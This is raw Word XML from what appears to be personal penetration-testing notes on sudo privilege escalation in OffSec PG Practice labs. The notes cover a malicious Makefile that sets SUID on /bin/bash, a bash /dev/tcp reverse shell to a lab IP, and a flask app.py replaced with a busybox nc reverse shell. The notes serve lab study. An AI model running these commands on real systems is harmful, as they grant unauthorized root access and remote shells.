    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId673">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create their own malicious Makefile from scratch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       @echo "Do nothing in all"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">install:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       chmod u+s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId674">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inspect the original makefile and redirect it to our own malicious binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The folder holds a lot of file which I suspect is the config folder for php-spx, so I checked the Makefile and found a line with variable ‘SHELL’ and value ‘/bin/sh’, figured it is trying to call a shell command so i modified that line since I have full privilege on the Makefile to call the file ‘sh’ in ‘tmp’ which I have edited to give me reverse shell, chmod it to be executable and let it fly, and YAKATA! I am root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="201" name="image199.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image199.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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1FBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The edited the specified line in the Makefile to run the shell command "bash /tmp/sh" which is our malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1117600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="163" name="image161.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image161.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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1FBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we see that /tmp/sh has the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/192.168.45.203/1337 0&gt;61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we run the command to get a shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to start a listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fkqjfdomoe5n" w:id="272"/>
      <w:bookmarkEnd w:id="272"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/use/bin/flask_password_changer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId677">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and I'm 99% sure this is a custom file and not a standard one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="439" name="image436.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image436.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId678"/>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1FC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After enumerating this file, we see it's a bash script so we read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="520700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="531" name="image506.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image506.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId679"/>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1FCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/password_change_appwhere </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the flask app should be </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="356" name="image361.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image361.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId680"/>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1FCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we (jack) own the directory and have full permissions on the directory. So, we can replace app.py (which is run by flask) with a malicious python reverse shell which is going to be be run using sudo privileges when we run that command we have permissions to run as sudo!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv app.py app.py.old</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename the original to something else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.system("busybox nc 192.168.45.154 3306 -e bash")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 3306</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/flask_password_changer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n14dqbeyblvo" w:id="273"/>
      <w:bookmarkEnd w:id="273"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/web-scraper</w:t>
      </w:r>
    </w:p>
